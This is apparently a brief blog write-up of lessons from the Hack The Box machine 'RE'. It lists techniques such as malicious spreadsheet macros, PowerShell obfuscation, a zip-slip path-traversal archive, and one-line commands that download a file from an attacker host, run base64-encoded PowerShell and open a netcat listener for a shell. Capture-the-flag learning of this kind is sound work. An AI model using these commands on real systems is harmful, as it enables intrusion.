RE HTB Writeup

Takeaways from RE box

The Re box created from 0xdf was retired later this day. I did solve the box after it was retired so now I am going to show you some key things I learned from this box. A list of these is here:

• Sometimes smbmap may throw false postivies. I always try to use smbclient.

• libreoffice calc also support macros, we can run malicious command from these docs.

• We can use [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation for powershell obfuscation) for powershell obfuscation

• The famous yara rules I saw on twitter but never took the chance to search it. Yara rules are basically a way to search for some common strings you provide to yara in order to identify malicious programs/files.

• I almost forgot about .ace files and winrar, and zipslip. This exploit was used on the box to go from one user to another. We had to create a malicious .zip file which contains inside a malicious file with a path traversal as filename.

• UPX I used this tool to make chisel.exe a little bit smaller. I have seen this from ippsec

• We can download file from powershell by using iwr -uri ip/file -outfile filename.evil

• We can run base64 encoded powershell commands but we need to use convert the strings to utf16 little endian using the command: iconv -t utf-16le and then pipe it to base64. After we can run the command by using powershell -encodedcommand base64string==

• Use rlwrap -nc -nvlp 7979 to have working arrow keys on windows.

• WinPeas
  Like LinEnum but for windows.

Thats all. I didn’t do the uninteded way. If you want to learn more goto 0xdf blog or see ippsec videos.